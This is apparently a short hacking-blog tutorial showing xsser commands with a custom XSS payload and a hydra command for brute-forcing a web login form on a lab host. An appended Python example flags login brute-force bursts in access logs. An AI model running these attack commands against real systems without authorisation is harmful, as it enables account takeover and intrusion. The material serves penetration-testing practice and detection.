root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!


Using xsser for cross-site scripting

xsser --url "http://10.10.10.10/index.php?page=dns-lookup.php" -p "target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS"

The string “target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS” was taken from Burp Suite; it is the POST data of the captured request. So the captured request determines how the -p value is constructed.

To run a custom payload

xsser --url "http://10.10.10.10/index.php?page=dns-lookup.php" -p "target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS" --Fp "<script>alert(1)</script>"

You can also just test this manually lol

Also check login pages for XSS

Using hydra to brute-force login pages

hydra -L users.txt -P pass.txt 10.10.10.10 http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!"

All of these values were taken from the source code of the web page, or you can just capture the login request in Burp and copy it. I’d still prefer using Burp Intruder lol
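
From the defending side, a hydra run like the one above appears in the web server's access log as a burst of POSTs to /login.php from one client. The Python below is an added example, not from the original post: it flags such bursts in constructed combined-format log lines. The function name, threshold, window, and sample addresses are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample access-log lines (not from the original page).
SAMPLE_LOG = "\n".join(
    # One client posting to the login form once per second for 8 seconds.
    [f'10.10.10.50 - - [12/Mar/2024:10:00:{s:02d} +0000] "POST /login.php HTTP/1.1" 200 1843'
     for s in range(1, 9)]
    # A normal user: one login, then another five minutes later.
    + ['10.10.10.77 - - [12/Mar/2024:10:00:03 +0000] "POST /login.php HTTP/1.1" 302 0',
       '10.10.10.77 - - [12/Mar/2024:10:05:40 +0000] "POST /login.php HTTP/1.1" 200 1843',
       # Unrelated GET traffic must not be counted.
       '10.10.10.50 - - [12/Mar/2024:10:06:00 +0000] "GET /index.php?page=dns-lookup.php HTTP/1.1" 200 5120']
)

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" \d{3}'
)

def find_login_bursts(log_text, login_path="/login.php", threshold=5, window_s=10):
    """Return {ip: peak count} for clients whose POSTs to login_path reach
    `threshold` inside any window_s-second sliding window.
    Assumes each client's lines are in chronological order, as in a live log."""
    recent = defaultdict(deque)   # per-client timestamps still inside the window
    peak = defaultdict(int)       # per-client highest count seen in one window
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Ignore any query string when comparing the request path.
        if m["path"].split("?", 1)[0] != login_path:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        # Drop attempts that have fallen out of the sliding window.
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        peak[m["ip"]] = max(peak[m["ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}

if __name__ == "__main__":
    for ip, n in find_login_bursts(SAMPLE_LOG).items():
        print(f"possible brute force: {ip} sent {n} login POSTs within 10s")
```

The count is rate-based because the failure message the hydra command matches on is in the response body, which a standard access log does not record.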